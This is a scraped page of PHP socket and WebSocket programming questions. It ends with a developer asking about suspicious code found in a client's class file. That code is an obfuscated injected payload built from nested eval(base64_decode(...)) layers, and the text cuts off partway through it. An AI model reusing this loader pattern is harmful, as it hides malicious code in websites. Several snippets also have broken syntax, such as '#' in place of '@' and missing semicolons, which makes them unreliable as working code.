Minecraft Server: PHP echo $server->online_players - php

I have a problem with my website (http://www.zurfaria.ga/1/), where I'm trying to check how many players are online. I have downloaded this GitHub repository (https://github.com/mattvh/MCServerStatus) so I can query my server, but I can't seem to echo it in my HTML Here is my HTML and the PHP
<?php
require_once('/onlinecheck/Server.php')
require_once('/onlinecheck/Stats.php')
require_once('/onlinecheck/StatsException.php')
class MCServerStatus {
public $server;
public $online, $motd, $online_players, $max_players;
public $error = "OK";
function __construct($url, $port = '25565') {
$this->server = array(
"zurfaria.fmc.pw" => $url,
"25565" => $port
);
if ( $sock = #stream_socket_client('tcp://'.$url.':'.$port, $errno, $errstr, 1) ) {
$this->online = true;
fwrite($sock, "\xfe");
$h = fread($sock, 2048);
$h = str_replace("\x00", '', $h);
$h = substr($h, 2);
$data = explode("\xa7", $h);
unset($h);
fclose($sock);
if (sizeof($data) == 3) {
$this->motd = $data[0];
$this->online_players = (int) $data[1];
$this->max_players = (int) $data[2];
}
else {
$this->error = "Cannot retrieve server info.";
}
}
else {
$this->online = false;
$this->error = "Cannot connect to server.";
}
}
}
?>
<h1>Players Online:</h1>
<?php
echo $server->online_players; //Outputs the number of players online
?>
The HTML in between this code is fine, it works. What can I do to fix this? (I've looked up how to use the echo but didn't really understand it...)

Related

Websocket failed "1006" w/o reason on GCE

everyone
I'm a new learner with websocket.
I want to deploy my websocket server on GCE.
However, I got some problem.
environment:
Backend:server.php(use php socket function) run on 8080 port
fronend:client.html(simple javascript)
GCE: Ubuntu 18.04, PHP 7.3, apache 2.4.29
without any google cloud sdk (only 2 program and 1 GCE instance)
problem:
Server can work well at my local machine (windows 10), but on GCE websocket will show "1006" error code.
There is a interesting thing that is client.html can work on GCE when I run server.php at local machine.
Is it normal? What is the connection with my local machine and GCE.
Maybe it's not a firewall blocking problem.
I wonder my websocket doesn't run because of the firewall port blocking at first.
I have set the VPC firewall rule with following GCP document and I also disable ufw on GCE.
I change the apache's port from 80 to 8080 and run apache.
It works successfully and I check netstat -an | grep "LISTEN "
I use telnet GCE_IP 8080 at my local machine but it can't connect.
Here is my code:
server.php
<?php
error_reporting(E_ALL);
set_time_limit(0);
class WebSocket {
const LOG_PATH = '/tmp/';
const LISTEN_SOCKET_NUM = 9;
private $sockets = [];
private $master;
public function __construct($host, $port) {
try {
$this->master = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_set_option($this->master, SOL_SOCKET, SO_REUSEADDR, 1);
socket_bind($this->master, $host, $port);
socket_listen($this->master, self::LISTEN_SOCKET_NUM);
} catch (\Exception $e) {
$err_code = socket_last_error();
$err_msg = socket_strerror($err_code);
}
$this->sockets[0] = ['resource' => $this->master];
$pid = posix_getpid();
while (true) {
try {
$this->doServer();
} catch (\Exception $e) {
}
}
}
private function doServer() {
$write = $except = NULL;
$sockets = array_column($this->sockets, 'resource');
$read_num = socket_select($sockets, $write, $except, NULL);
if (false === $read_num) {
return;
}
foreach ($sockets as $socket) {
if ($socket == $this->master) {
$client = socket_accept($this->master);
if (false === $client) {
continue;
} else {
self::connect($client);
continue;
}
} else {
$bytes = #socket_recv($socket, $buffer, 2048, 0);
if ($bytes < 9) {
$recv_msg = $this->disconnect($socket);
} else {
if (!$this->sockets[(int)$socket]['handshake']) {
self::handShake($socket, $buffer);
continue;
} else {
$recv_msg = self::parse($buffer);
}
}
array_unshift($recv_msg, 'receive_msg');
$msg = self::dealMsg($socket, $recv_msg);
$this->broadcast($msg);
}
}
}
public function connect($socket) {
socket_getpeername($socket, $ip, $port);
$socket_info = [
'resource' => $socket,
'uname' => '',
'handshake' => false,
'ip' => $ip,
'port' => $port,
];
$this->sockets[(int)$socket] = $socket_info;
}
private function disconnect($socket) {
$recv_msg = [
'type' => 'logout',
'content' => $this->sockets[(int)$socket]['uname'],
];
unset($this->sockets[(int)$socket]);
return $recv_msg;
}
public function handShake($socket, $buffer) {
$line_with_key = substr($buffer, strpos($buffer, 'Sec-WebSocket-Key:') + 18);
$key = trim(substr($line_with_key, 0, strpos($line_with_key, "\r\n")));
$upgrade_key = base64_encode(sha1($key . "258EAFA5-E914-47DA-95CA-C5AB0DC85B11", true));
$upgrade_message = "HTTP/1.1 101 Switching Protocols\r\n";
$upgrade_message .= "Upgrade: websocket\r\n";
$upgrade_message .= "Sec-WebSocket-Version: 13\r\n";
$upgrade_message .= "Connection: Upgrade\r\n";
$upgrade_message .= "Sec-WebSocket-Accept:" . $upgrade_key . "\r\n\r\n";
socket_write($socket, $upgrade_message, strlen($upgrade_message));
$this->sockets[(int)$socket]['handshake'] = true;
socket_getpeername($socket, $ip, $port);
$msg = [
'type' => 'handshake',
'content' => 'done',
];
$msg = $this->build(json_encode($msg));
socket_write($socket, $msg, strlen($msg));
return true;
}
private function parse($buffer) {
$decoded = '';
$len = ord($buffer[1]) & 127;
if ($len === 126) {
$masks = substr($buffer, 4, 4);
$data = substr($buffer, 8);
} else if ($len === 127) {
$masks = substr($buffer, 10, 4);
$data = substr($buffer, 14);
} else {
$masks = substr($buffer, 2, 4);
$data = substr($buffer, 6);
}
for ($index = 0; $index < strlen($data); $index++) {
$decoded .= $data[$index] ^ $masks[$index % 4];
}
return json_decode($decoded, true);
}
private function build($msg) {
$frame = [];
$frame[0] = '81';
$len = strlen($msg);
if ($len < 126) {
$frame[1] = $len < 16 ? '0' . dechex($len) : dechex($len);
} else if ($len < 65025) {
$s = dechex($len);
$frame[1] = '7e' . str_repeat('0', 4 - strlen($s)) . $s;
} else {
$s = dechex($len);
$frame[1] = '7f' . str_repeat('0', 16 - strlen($s)) . $s;
}
$data = '';
$l = strlen($msg);
for ($i = 0; $i < $l; $i++) {
$data .= dechex(ord($msg{$i}));
}
$frame[2] = $data;
$data = implode('', $frame);
return pack("H*", $data);
}
private function dealMsg($socket, $recv_msg) {
$msg_type = $recv_msg['type'];
$msg_content = $recv_msg['content'];
$response = [];
switch ($msg_type) {
case 'login':
$this->sockets[(int)$socket]['uname'] = $msg_content;
$user_list = array_column($this->sockets, 'uname');
$response['type'] = 'login';
$response['content'] = $msg_content;
$response['user_list'] = $user_list;
break;
case 'logout':
$user_list = array_column($this->sockets, 'uname');
$response['type'] = 'logout';
$response['content'] = $msg_content;
$response['user_list'] = $user_list;
break;
case 'user':
$uname = $this->sockets[(int)$socket]['uname'];
$response['type'] = 'user';
$response['from'] = $uname;
$response['content'] = $msg_content;
break;
}
return $this->build(json_encode($response));
}
private function broadcast($data) {
foreach ($this->sockets as $socket) {
if ($socket['resource'] == $this->master) {
continue;
}
socket_write($socket['resource'], $data, strlen($data));
}
}
}
$ws = new WebSocket("localhost", "8080");
client.html
<html>
<head>
<title></title>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<style>
p {
text-align: left;
padding-left: 20px;
}
</style>
</head>
<body>
<div style="width: 800px;height: 600px;margin: 30px auto;text-align: center">
<h1>chat room</h1>
<div style="width: 800px;border: 1px solid gray;height: 300px;">
<div style="width: 200px;height: 300px;float: left;text-align: left;">
<p><span>online:</span><span id="user_num">0</span></p>
<div id="user_list" style="overflow: auto;">
</div>
</div>
<div id="msg_list" style="width: 598px;border: 1px solid gray; height: 300px;overflow: scroll;float: left;">
</div>
</div>
<br>
<textarea id="msg_box" rows="6" cols="50" onkeydown="confirm(event)"></textarea><br>
<input type="button" value="send" onclick="send()">
</div>
</body>
</html>
<script type="text/javascript">
var uname = prompt('type your name', 'user');
var ws = new WebSocket("ws://127.0.0.1:8080");
ws.onopen = function () {
var data = "system:connect successfully";
listMsg(data);
};
ws.onmessage = function (e) {
var msg = JSON.parse(e.data);
var sender, user_name, name_list, change_type;
switch (msg.type) {
case 'system':
sender = 'system: ';
break;
case 'user':
sender = msg.from + ': ';
break;
case 'handshake':
var user_info = {'type': 'login', 'content': uname};
sendMsg(user_info);
return;
case 'login':
case 'logout':
user_name = msg.content;
name_list = msg.user_list;
change_type = msg.type;
dealUser(user_name, change_type, name_list);
return;
}
var data = sender + msg.content;
listMsg(data);
};
ws.onerror = function () {
var data = "system : something wrong";
listMsg(data);
};
function confirm(event) {
var key_num = event.keyCode;
if (13 == key_num) {
send();
} else {
return false;
}
}
function send() {
var msg_box = document.getElementById("msg_box");
var content = msg_box.value;
var reg = new RegExp("\r\n", "g");
content = content.replace(reg, "");
var msg = {'content': content.trim(), 'type': 'user'};
sendMsg(msg);
msg_box.value = '';
}
function listMsg(data) {
var msg_list = document.getElementById("msg_list");
var msg = document.createElement("p");
msg.innerHTML = data;
msg_list.appendChild(msg);
msg_list.scrollTop = msg_list.scrollHeight;
}
function dealUser(user_name, type, name_list) {
var user_list = document.getElementById("user_list");
var user_num = document.getElementById("user_num");
while(user_list.hasChildNodes()) {
user_list.removeChild(user_list.firstChild);
}
for (var index in name_list) {
var user = document.createElement("p");
user.innerHTML = name_list[index];
user_list.appendChild(user);
}
user_num.innerHTML = name_list.length;
user_list.scrollTop = user_list.scrollHeight;
var change = type == 'login' ? 'online' : 'offline';
var data = 'system:' + user_name + ' is' + change;
listMsg(data);
}
function sendMsg(msg) {
var data = JSON.stringify(msg);
ws.send(data);
}
</script>
on GCE VM:
update
internal IP: .3
external IP: .62
1.
netstat -an | grep "LISTEN " to check if you configured internal IP instead of localhost or/and 127.0.0.1
.
I change my internal IP in the server.php and run.
It looks like working perfectly.
2.
Connection check from the GCE VM to GCE_VM_INTERNAL_IP:8080.
.
Connect successfully!
3.
Connection check from you personal computer to
GCE_VM_EXTERNAL_IP:8080. Also, consider to use curl instead of
telnet
.
It seems that handshaking can work.
I can get websocket message from GCE with internal IP and PC with external IP.
So my problem is maybe like in javascript?
It doesn't send the handshaking frame.

How to get http response in php ratchet

I am going to build a system which will receive a streaming raw data form browser. Data will use websocket to transmit and receive, then system will keep going to send chunk data to HTTP server. Flowchart show below:
First, I separate websocket server and HTTP client into 2 program, both can work. websocket server use ratchet, HTTP client use stream_socket_client and stream_select.
Then, I try to combine websocket server and HTTP client together, I can receive data from browser but I cannot get any response from HTTP server. How can I get HTTP response in Ratchet? Many Thanks.
The following is my php code:
Chat.php
<?php
namespace MyApp;
use Ratchet\MessageComponentInterface;
use Ratchet\ConnectionInterface;
function read_response_code($response){
foreach (explode("\n", $response) as $a) {
if (strpos($a, 'HTTP/1.1') !== false) {
$arr = explode(" ", $a);
if ($arr[1] != "100")
{
return 0;
}
return 1;
}
}
return 0;
}
class Socket implements MessageComponentInterface {
protected $clients;
public function __construct(){
$this->clients = new \SplObjectStorage;
$this->SERVER = "tcp://192.168.0.1:80";
$this->socket = [];
$this->clients->connect = 0;
}
public function onOpen(ConnectionInterface $conn) {
// Store the new connection to send messages to later
$this->clients->attach($conn);
echo "New connection! ({$conn->resourceId})\n";
echo "Try to connect http server...\n";
$this->socket = stream_socket_client($this->SERVER, $errno, $errstr, 30);
if (!$this->socket){
//disconnect websocket
$conn->close();
}
else{
$header = "POST / HTTP/1.1\r\n"
. "Host: 192.168.0.1\r\n"
. "Accept: */*\r\n"
. "Content-Type: application/octet-stream\r\n"
. "Transfer-Encoding: chunked\r\n"
. "Expect: 100-continue\r\n\r\n";
$written = fwrite($this->socket, $header);
$response = fread($this->socket, 100);
$ret = read_response_code($response);
if ($ret == 0)
{
echo "Connect HTTP server fail.\n";
$conn->close();
}
else
{
echo "Connect success!!!!\n";
$this->clients->connect = 1;
}
}
}
public function onMessage(ConnectionInterface $from, $msg) {
//combine http client
if ($this->clients->connect == 1)
{
$read = array($this->socket);
$write = NULL;
$except = NULL;
$num = stream_select($read, $write, $except, 0, 400000);
if ($num === false) {
/* Error handling */
}
elseif ($num > 0) {
// cannot read any response
echo "xxxxxxxxxxxxxx";
}
else {
// send data to HTTP server
$size = strlen($msg);
$hex = dechex($size);
fwrite($this->socket, "$hex\r\n");
$written = fwrite($this->socket, $msg);
fwrite($this->socket, "\r\n");
}
}
}
public function onClose(ConnectionInterface $conn) {
// The connection is closed, remove from connection list
$this->clients->detach($conn);
echo "Connection {$conn->resourceId} has disconnected\n";
}
public function onError(ConnectionInterface $conn, \Exception $e) {
echo "An error has occurred: {$e->getMessage()}\n";
$conn->close();
}
}
Chat-server.php
<?php
use Ratchet\Server\IoServer;
use Ratchet\Http\HttpServer;
use Ratchet\WebSocket\WsServer;
use MyApp\Chat;
require dirname(__DIR__) . '/vendor/autoload.php';
$loop = \React\EventLoop\Factory::create();
$server = IoServer::factory(
new HttpServer(
new WsServer(
new Socket()
)
),
8080
);
$server->run();
HTTP_client.php
<?php
$SERVER = "tcp://192.168.0.1:80";
$SEND_STATUS = 0;
$file = fopen("test.raw", "rb");
$socket = stream_socket_client($SERVER, $errno, $errstr, 30);
$header = "POST / HTTP/1.1\r\n"
. "Host: 192.168.0.1\r\n"
. "Accept: */*\r\n"
. "Content-Type: application/octet-stream\r\n"
. "Transfer-Encoding: chunked\r\n"
. "Expect: 100-continue\r\n\r\n";
$written = fwrite($socket, $header);
$response = fread($socket, 100);
function send_data($file, $socket, $bytes) {
global $SEND_STATUS;
if ( feof($file) ) {
$SEND_STATUS = 1;
fwrite($socket, "0\r\n\r\n");
fclose($file);
return(false);
}
$buffer = fread($file, $bytes);
$size = strlen($buffer);
$hex = dechex($size);
fwrite($socket, "$hex\r\n");
$written = fwrite($socket, $buffer);
fwrite($socket, "\r\n");
}
while (true) {
$read = array($socket);
$write = NULL;
$except = NULL;
$num = stream_select($read, $write, $except, 0, 400000);
if ($num === false) {
/* Error handling */
}
elseif ($num > 0) {
foreach ($read as $r) {
echo "xxxxxxxxx";
}
}
else {
if ( $SEND_STATUS === 0 ) {
send_data($file, $socket, 16000);
}
}
}
?>

socket_select() not a valid socket

I got this error:
Warning: socket_select(): supplied argument is not a valid Socket resource in /volume1/web/is/xxxx/listen-new.php on line 12
PHP Warning: socket_select(): supplied argument is not a valid Socket resource in /volume1/web/is/xxxx/listen-new.php on line 12
this my snippet code
My code is:
$port = $this->port;
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_set_option($sock, SOL_SOCKET, SO_REUSEADDR, 1);
socket_bind($sock, 0, $port);
socket_listen($sock);
$this->clients[] = $sock;
$data = array();
while (true) {
$read = $this->clients;
$write = array(); //NULL
$except = array();//NULL
$sckt = socket_select($read, $write, $except, 0);
if($sckt === false){
echo "socket_select() failed, reason: " .
socket_strerror(socket_last_error()) . "\n";
}
elseif($sckt > 0) {
if (in_array($sock, $read)) {
$this->clients[] = $newsock = socket_accept($sock);
//var_dump($this->gps);
socket_write($newsock, "Connected\n");
//var_dump($this->gps);
/**try{
socket_getpeername($newsock, $ip); //error
echo "New client connected: {$ip}\n";
}
catch(Exception $e){
echo "error : $e->getMessage()\n";
}**/
$key = array_search($sock, $read);
unset($read[$key]);
}
foreach ($read as $read_sock) {
$data = #socket_read($read_sock, 2048);
if ($data === false) {
$gpsdisc = array_search($read_sock, array_column($this->gps, 'pid'));
$key = array_search($read_sock, $this->clients);
unset($this->clients[$key]);
unset($this->gps[$gpsdisc]);
echo "client disconnected.\n";
continue;
}
else{
$data = trim($data);
if (!empty($data)) {
var_dump($data);
$buf = bin2hex($data);
$start = substr($buf, 0,4);
if($start=="7878"){
$protocol = substr($buf, 6,2);
if($protocol=="01"){
$imei = substr($buf, 8,16);
$cariGPS = $this->cariGPS($imei);
if($cariGPS!=NULL){
$this->setGPS($imei,$read_sock,$cariGPS);
$reply = $this->authLogin($data);
$rep = hex2bin("$reply");
socket_write($read_sock, $rep, strlen($rep));
}
else
echo "$imei salah";
}
elseif($protocol=="15"){
//echo "$buf\n";
$this->reply($data);
}
elseif($protocol=="12"){
$hex12 = bin2hex($data);
//echo "$hex12\n";
}
else{
$hex12 = bin2hex($data);
echo "$hex12\n";
}
echo "$protocol\n";
}
else{
if($data=="where"){
//echo $data."\n";
$this->where($this->gps);
}
elseif($data=="quit"){
$gpsdisc = array_search($read_sock, array_column($this->gps, 'pid'));
unset($this->gps[$gpsdisc]);
socket_close($read_sock);
$key = array_search($read_sock, $this->clients);
unset($this->clients[$key]);
}
else{
echo "command not found\n";
}
}
}
}
}
}
}
socket_close($sock);
PS I also had to change $write = null and $except = null
Are there any solution for this?
It looks like you supplied only the server code but omitted the client code. Can you post the client code please? I guess the problem is there. With my test client (fyi I used socket_create) I cannot reproduce the problem you are reporting.
Also mine is php7 (if you are curious).
This may have some hints for you: Socket_read() says "not a valid resource"

how to accept multiple connection to the device

I am creating a socket script that will listen to our 3 devices.and the device is setup in one server ip and one port only.
$file = fopen('txt.log','a+');
$server = stream_socket_server('tcp://'.$ipserver.':'.$port, $errno, $errorMessage);
if(!$server) {
echo "$errorMessage ($errno)<br />\n";
}
else{
while($client = #stream_socket_accept($server,$timeout)) {
stream_copy_to_stream($client, $file);
fclose($file);
fclose($client);
}
}
but the problem is that if one device is connected,the two devices cannot connect anymore.I appreciate some one can help me how to get this work.or give me some idea
Thank you in advance.
$file = fopen('txt.log', 'a+');
$server = stream_socket_server("tcp://$ipserver:$port", $errno, $errorMessage);
if (!$server)
echo "$errorMessage ($errno)<br />\n";
else
{
$s = array($server);
$t = $timeout == -1 ? NULL : $timeout;
while ($r = $s and stream_select($r, $n=NULL, $n=NULL, $t))
foreach ($r as $stream)
if ($stream == $server) // new client
$s[] = stream_socket_accept($server, -1);
else
if (!fputs($file, fgets($stream)))
{
fclose($stream);
array_splice($s, array_search($stream, $s), 1);
}
}

Found this very strange PHP code in one of my class files. What is it?

I built a website for a client a while ago who has been having issues with it. After getting into the site files I found this at the top of one of the PHP classes:
<?php
/*ad0b18735e68b25aa9c4374221824db5_on*/ $byJtFKIhXRt8KPNfT1me8ooOBXon8QgWfQgLqPSdxb= array('8759','8776','8755','8766');$ARPcAGpFFDTk4GyiFfpsl5zXmfFqCHsAp8DQFSlbm5lhCJq8P= array('8569','8584','8571','8567','8586','8571','8565','8572','8587','8580','8569','8586','8575','8581','8580');$J0BQOOWj4oRnP7liN= array('7450','7449','7467','7453','7406','7404','7447','7452','7453','7451','7463','7452','7453');$UbjPmIKWlC="eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0poVjFsblMwTkdiV1JYTldwa1IyeDJZbXc1YkdWSGJIcGtTRTF2U1d0a2JHUkZNV2hpVjBWcFMxTnNOMGxEUW0xa1Z6VnFaRWRzZG1KcFFuUmlNbEptV1RJNWRVdERVbWxrVjFsd1pUTk9NR05zT1hCamJWWjNZa2RHYWxwVFoybFFSMHAyV2tockswbHBkMmxRUjBwMldraHJLMGxwZDJ0WmJsWnRURU5TYW1KdVVtWmhRMnMzWVZkWlowdERVbXBpYmxKbVlVTkJPVkJUUVhoTFUwSTNTa2RLTVZwcFFUbEpTRTR3WTJ3NWNHTnRWbmRpUjBacVdsTm5hVkJIU25aYVNHc3JTV2wzYVZCSFNuWmFTR3NyU1dsQmRVbElUakJqYld4M1l6SjRhR015YUd4amVXZHJXREZPUmxWc1drWlZiSE5wV2pJNWRscERTbVJMVTNkcldXNVdiVXRVYzJkamJWWXdaRmhLZFVsRFVtbGtWMWszWmxoT01HTnNPWEJqYlZaM1lrZEdhbHBUWjJsUVF6bHBZakpTTlZCcFNYTkphbmQyV1cwNWEyVlVOR2xNUTFKcFpGZFpjMHBIVG5Wa1JqbHZTMVIwY0ZwcFFXOUtSMDUxWkVZNWIwbEVNRGxKUkVWd1NVaHphMWx1Vm0xSlJEQm5Zek5TZVZneWJIbGFXRUp6V1ZkT2JFdERTVGhNTWtwMldraHJLMGxwZUhwa1NFcHdZMGhPYzFsWVRtOWFXRTF2U2tZNVZGSldTbGRTVmtwaVNXMWtkbUl5VVdsWVUydDFTV3AzZGxsdE9XdGxWRFJwVEVOU2FXUlhXWEJQZVVKNVdsaFNNV050TkdkS1Iwb3hXbXAwT1dOdFZqQmtXRXAxU1VOU2FXUlhXVGRtVjFveFltMU9NR0ZYT1hWSlJ6bDNXVmMxY21GVFoydFpibFp0UzFoemExb3pjR1phVTBFNVNVZGFhR0pJVG14UGVWSnZXREozWjFCVFFtOWFWMFpyV2xoS2VsZ3llSEJqTTFGdlMxUjBjRnBwUVc5aFZ6Vm1XVmhLZVZsWWEyOUphMDUyWW01U2JHSnVVWFJTVnpWcVlqSlNjR0p0WXpaSlIyUTJZVmhCYVV4RFFXdGhSamx6UzFOcloyVjVRV3RhTTNCbVdsTkJPVWxJVW5sa1YxVTNabGRzYlVsRFoydGFNM0JtV2xOc04wcElVblJqUjFwMVdWY3hiRWxFTUdka1IxWjBZMGMxYUdKVFoybE1NMUowWTBOSmMwbERTa2RVTURocFMxUjBiV0ZYZUd4WU0wSXhaRVk1YW1JeU5UQmFWelV3WTNsbmEyUkhNWGRhYlRWb1lsZFZjMGxEVW1sa1YxbHdUM2xTTmxwRFFUbEpSMlEyWWpOQ2JHSnBaMnRrUnpGM1dtMDFhR0pYVlhOSlEwcDVTV2xyTjBwSFRuWmlibEpzWW01U2VrbEVNR2RhTTNCNVdsZEdhMHREVWpaYVEzZG5UVlJCZDAxRVFYZE5SRUZ3VDNsU2FtSXlOVEJhVnpVd1kzbEJPVWxITVhaYVJqbHFZakkwYjBwSFRuWmlibEpzWW01U2VrdFVkRzVsYlU1ellqTk9iRXREVWpaYVEyczNaRmMxYzJGWE5YSkxRMUl3WWxoQ2JXSnRSblJhVTJzM1NrZE9kbUp1VW14aWJsSjZTVVF3WjFvemNHeGliVTUyV2tkVmIwcEhUblppYmxKc1ltNVNla3RVZERsSlIxWnpZekpWWjJWNVVtcGlNalV3V2xjMU1HTjVRVGxKUnpGMldrWTVhbUl5Tkc5S1Iwb3hXbWxyTjJaVFVuTmFWelJuVUZOQ2VtUklTbk5hVnpSdlNrZE9kbUp1VW14aWJsSjZTMVIwYjFwWFJtdGFXRWx2U1d0T2RtSnVVbXhpYmxGMFZFZFdkVm96VW05UGFVRnBUR2xTYzFwWE5IQlBNMHBzWkVoV2VXSnBaMnRaTWpsMVpFZFdkV1JJVFhCUE16Qm5XbTVXZFZrelVuQmlNalJuVWpKV01GUlhSblJaVTJkd1pYbFNkR0l6VW05YVdFbG5VRk5CYVdKWFVubGlWMVpyWVZkR2JtTnRPVEZqUXpWcVlqSXdhVTh6U214a1NGWjVZbWxCYTJKWE9UQmhSMVo1VHpNeGRsbHNPWHBrUjBaNVpFTm5hV0l6UW1oaWJYUndTV2xyTjFwdVZuVlpNMUp3WWpJMFoxbFhhRzFrVjFKdFlrZGFObHBIYUcxaFNFMXZTa2hDYUV0WWMydGlWMFowV1ZOQk9VbEZaR3hrUlRGb1lsZEZiMHRVYzJ0YWJXeHpXbE5CT1VsSVZubGlSMVoxV1RJNWExcFRhR1pZTUZwS1ZFVldabGg1YXpkaFYxbG5TMGRzZW1NeVZqQkxRMUptVlRCV1UxWnJWbE5YZVVwSlZrWlNVVmd3YUZCVk1WRnBXRk5yY0dWNVVtOWlNMDR3U1VRd1owcEdPVlJTVmtwWFVsWktZa2xyYUZWV1JrSm1VMFU1VkZaRFNtUlBNekJuV2xkNGVscFRRamRLUjJoMll6TlJaMUJUUVdsSmFuUTVZVmRaWjB0SGJIcGpNbFl3UzBOU1psVXdWbE5XYTFaVFYzbEtVMUpWTVZCV1JWWm1VVlZTUlZWcFNtUkxVMnczU2tkc2QwbEVNR2RLUmpsVVVsWktWMUpXU21KSmJFcEdWRlU1VlZKV09VSlNSVkpUU1d3d04yWlRRbXhpU0U1c1NVaHphMkZZUVdkUVUwRnBTV3AwT1dGWFdXZExSMng2WXpKV01FdERVbVpWTUZaVFZtdFdVMWQ1U2tsV1JsSlJXREZLUmxKclZsTlNWa2xwV0ZOcmNHVjVVbmxhVjFsblVGTkNNV050ZUd4aWJVNTJXa2RWYjBwR09WUlNWa3BYVWxaS1lrbHJhRlZXUmtKbVZXdFdSMUpXU2taVmFVcGtTMVIwT1VsSFZuTmpNbFZuWlhsU2VWcFhXV2RRVTBGcFNXcDBPV0ZYV1dkTFIyeDZZekpXTUV0RFVtWlZNRlpUVm10V1UxZDVTa2xXUmxKUldERldWRkpXU21aUlZXUkdWR3hSYVZoVGEzQmxlVkl4V1ZOQk9VbElWbmxpUjFaMVdUSTVhMXBUYUhwa1NFb3dZako0ZG1ReVZubExRMUptVlRCV1UxWnJWbE5YZVVwSlZrWlNVVmd4VmxSU1ZrcG1VVlZrUmxSc1VXbFlVMnR3VHpNd1oxcFhlSHBhVTBJM1NraFdhRWxFTUdkSmFVazNabGRzYlVsRGFIQmpNMDVzWkVObmExZ3hUa1pWYkZwR1ZXeHphVlZXVmtaVmJHeG1WVEZTVTFOVk5VaEpiREJ3UzFoemEyTllUV2RRVTBJeFkyMTRiR0p0VG5aYVIxVnZTa1k1VkZKV1NsZFNWa3BpU1d4R1ZsSldTbHBZTVU1VlZXdHNUMUo1U21STFZIUTVTVWRXYzJNeVZXZGxlVko0WTNsQk9VbERTV2xQTXpCclpGaEtjMWg2UVdkUVUwRnBZVWhTTUdORWIzWk1lVWxuVEdsQmEyTkhSVGRLU0ZaNVlrWTRlRWxFTUdkSmFUbHhXbGRTY0V4dVFtOWpSRGt5V2xoS2VtRlhPWFZRVkVFMVQxUk5iV0pYT1RCaFIxWjVVRk5KWjB4cFVuUlpWekZvU1VNMFowbHBXbTFoVjNoc1VGTkpaMHhwUVd0YWJXeHpXbE5CZFVsRFNXMWhSemw2WkVRd2FVbEROR2RLUjJoMll6TlJaMHhwUVdsS2JXeDNVRk5KWjB4cFFXdGhXRUZuVEdsQmFVcHVTbXhhYWpCcFNVTTBaMHBJU214YWFVRjFTVU5KYldSWFJUbEphVUYxU2toV2FFbEROR2RKYVZwNFkzb3dhVWxETkdkS1NFWjZUM2xTTUdOdWEyZFFVMEl3WTI1V2JFOHliRzFMUTBKdFpGYzFhbVJIYkhaaWJEbHNaVWRzZW1SSVRXOUpiVTR4WTIxNFptRlhOWEJrUTBsd1NVTnNOMHBIVG05SlJEQm5XVE5XZVdKR09YQmliV3d3UzBOU01XTnRlR1pOUTBGMVNVTlNNV050ZUdaTlUyczNXVE5XZVdKR09YcGFXRkoyWTBoUmIwcEhUbTlNUTBKRVZsWktUVlF4UWxWWU1VcEdWa1pXVTFSc1VsTlJWVFZVVW10V1UweERRWGhMVkhScVpGaEtjMWd6VG14a1J6bDNaRU5uYTFreVozTkpSVTVXVld0NFVGVkdVbVpXUld4T1VsVTVWbFpEZDJkTmVXczNTa2hXYzJSRFFUbEpTRko1WVZjd2Ixa3pWbmxpUmpsc1pVZFdha3REVW1waFEydHdUM2xTTUdOdWEyZFFVMEp0V1ZkNGVscFVkRGxKUjJ4dFNVTm5iMkZYTlhCWU1tUnNaRU5uYVZsWGVITmlNMlJtWkZoS2MxZ3lXblpqUjFaMVNXbHJjRWxEV1cxSlExSXdZMjVyY0VsSWMydGtWM2d3U1VRd1oyUklTbkJpVTJoQldtMXNjMXBXT1c1YVdGSm1XVEk1ZFdSSFZuVmtTRTF2U2toV2VXSkdPSGRKUXpSblNraFdlV0pHT0hoTFUyczNTa2hTZVdWVFFUbEpSMXBvWWtoT2JFOHpNWEJhYVdkclpFaEtOVXRZYzJ0YWJrRm5VRk5DYldNeU9XcGhNamwzV2xjMGIwcElRbWhNUTBFMFRVTjNaMHBIVm5samJUVjJURU5CYTFwWVNubGpNMUo1VEVOQmVrMURhemRoVjFsblMwTlNiV05EYTJkbGVWSjJaRmhSWjFCVFFXbFNNRlpWU1VOU01XTnRlR1pOVTBKSlZrWlNVVXg2UlhWTlJuaDVXRWMwYVU5NVVuWmtXRkZuVEdvd1owbHJhSFpqTTFFMlNVTlNkMWxXZUhsWVJ6UnBUM2xTZG1SWVVXZE1hakJuU1d0T2RtSnROV3haTTFKd1lqSTBOa2xGVG5OaU0wNXNXRWhLWTJKc2VIbFlSelJwVHpKYU0yTnRiREJhVTJkcldtNUJjMGxEVW5aa1dGRndUM2xTZVZwWVVXZFFVMEZwU1dwME0yRkhiSE5hVTBGdlNWZGFiR0l5V1c5S1IxcDNTMU5yWjJWNVVubGFXRkZuU1VNME9VbERRbTFhTWxZd1kzbG5hMXB1UVhOSlJFVjVUME5yTjJaWFdtcGlSemw2V2xObmExcHVRWEJQZVZJeFlraFJaMUJUUWpCamJXeDBTMGhPTVZsdVRqQmphV2RyWTIxV01FeERRbnBrU0VwM1lqTk5iMHBJU214a1EzZG5TV3g0ZVZoSE5XTmpiSGgxU1dsclowdDVRVEJMVTJzM1psZ3daMGxIYkcxSlEyaDZaRWhLZDJJelRXOUtTRlp6WkVOM2FWcFlXbWhpUTBsd1NVTkZPVkJUUW0xWlYzaDZXbE5zTjBwSWIyZFFVMEo2WkVoS2NHTklUbk5aV0U1dldsaE5iMk16VW5sWU0wcHNZMGQ0YUZreVZXOUpiVll5V1ZkM2FVeERTV2xNUTFJeFlraFJjRXRVYzJkYVdGcG9Za05uYTJWcGF6ZEpSMVkwWVZoUmIwdFVkRGxoVjFsblMwaE9NR051UW5aamVXZHJaRmQ0TUV4RFNteFpiVFZvU1dsclowbFVNRGxKUjFwb1lraE9iRXRZYzJ0WU1VNUdWV3hhUmxWc2MybGFNamwyV2tOS1pFbEVNR2RqTTFKNVdETktiR05IZUdoWk1sVnZTVzFXYVdKdFJXbE1RMGxwVEVOU01XSklVWEJQTTBwc1pFaFdlV0pwUWpCamJsWnNUek14YkdKSVRteEpTSFI1V2xoU01XTnROR2RhYlVaell6SlZOMlpZTUd0YWJVWXdZVWRXZVUxc2RHUkpSREJuU1dwak0weHFaM2hNYWtrd1RWTTBlVTVVVFdsUGVWSnRXVmhTYjFwWVNYbFhNVEJuVUZOQmFVNUVXWFZOYWxFMVRHcFZORXhxUlhwT1UwazNTa2RhYUdSSGFHeGpha3BpV0ZOQk9VbERTWGhPZWxsMVQxTTBlVTVFUlhWTlZGVjNTV3B6